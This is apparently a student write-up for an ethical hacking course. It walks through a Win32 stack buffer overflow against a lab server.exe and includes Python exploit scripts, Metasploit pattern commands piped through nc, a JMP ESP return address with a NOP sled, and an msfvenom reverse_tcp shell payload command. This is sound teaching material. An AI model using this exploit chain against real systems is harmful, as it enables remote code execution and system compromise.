CSI5208 Ethical Hacking and Defence
Task
You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.
Answer
Exploit development is conducted to gain control over a computer system by taking advantage of bugs and vulnerabilities that allow privilege escalation or a denial of service attack. The development process consists of several phases, and each phase must be completed before moving on to the next.
Initiation phase: the whole development process was conducted on a Linux platform. First, the Win32 buffer victim virtual machine is started after the Kali virtual machine has been opened. Both virtual machines are set to NAT networking, and the IP address of each machine is checked.
Overflow:
#!/usr/bin/python
import sys
import os
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# Testing: 500 bytes of 'A' (0x41) to confirm the server crashes on a long input
buffer = "\x41" * 500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
On the Windows host, Immunity Debugger is opened and server.exe is run from it; execution is started by pressing the F9 key. A Python file named "attack.py" is then created (the code is shown above) and run with the command "python attack.py IP_ADDRESS 1337", where the IP address is that of the Windows virtual machine. We then switch to the Windows environment and press Shift+F9 to pass the exception to the executable.
We can see that EIP now contains our value, as does EBP, while ESP points to a region of memory that contains our injected data.
Weaponizing the vulnerability:
In this phase, server.exe is restarted by pressing Ctrl+F2 within Immunity Debugger, and execution is started again by pressing F9. In Kali, change into the Metasploit tools directory by running cd /usr/share/metasploit-framework/tools/exploit, then run ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337, where IP_ADDRESS is the IP address of the Windows VM. Press Shift+F9 within Immunity Debugger to pass the exception and note the value now in EIP. Run "./pattern_offset.rb -l 5000 -q 37694136" within Kali to determine the offset at which EIP is overwritten. Next we must determine the address of an instruction that jumps to ESP.
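To make the pattern_offset step concrete, here is an added example (not part of the original answer and not the Metasploit tools' own code) that reimplements the cyclic-pattern generation and the offset lookup in Python. The register value 37694136 is decoded as the little-endian bytes "6Ai7" and located in the pattern, which gives the 260-byte offset used in the modified attack.py.

```python
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGIT) * 3  # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Build the cyclic pattern that pattern_create.rb emits (Aa0Aa1Aa2...Ab0...).

    Every 4-byte window in the pattern is unique, so whatever lands in EIP
    identifies the exact position in the buffer it was copied from.
    """
    if not 0 < length <= MAX_UNIQUE:
        raise ValueError("length must be 1..%d to keep every window unique" % MAX_UNIQUE)
    chunks = (u + l + d for u, l, d in itertools.product(UPPER, LOWER, DIGIT))
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip_value):
    """Return the buffer offset whose bytes overwrote EIP, or None if not found.

    eip_value is the 32-bit register value as the debugger shows it (0x37694136).
    x86 is little-endian, so the register shows the four bytes reversed; packing
    it back with "<I" recovers the order the bytes had in the buffer ("6Ai7").
    """
    data = pattern.encode("ascii")
    idx = data.find(struct.pack("<I", eip_value))
    if idx == -1:  # pattern_offset.rb also tries the big-endian reading
        idx = data.find(struct.pack(">I", eip_value))
    return None if idx == -1 else idx


if __name__ == "__main__":
    # The workshop values: a 5000-byte pattern and the EIP seen in Immunity Debugger.
    eip = 0x37694136
    print("EIP 0x%08X is at offset %s" % (eip, pattern_offset(pattern_create(5000), eip)))
```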
attack.py is then modified as follows:
#!/usr/bin/python
import sys
import os
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# EIP is overwritten at 260 bytes
buffer = "\x41" * 260
# Overwrite EIP with the address of a JMP ESP (0x77F31678, written little-endian)
buffer += "\x78\x16\xF3\x77"
# NOP sled
buffer += "\x90" * 128
# Shellcode: paste the msfvenom -f python output here (omitted on this page)
shellcode = ""
buffer += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
Shellcode
- Enter Kali.
- Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python, where <KALI_IP> is the IP address of the Kali virtual machine.
- Modify the attack.py file to include the generated shellcode.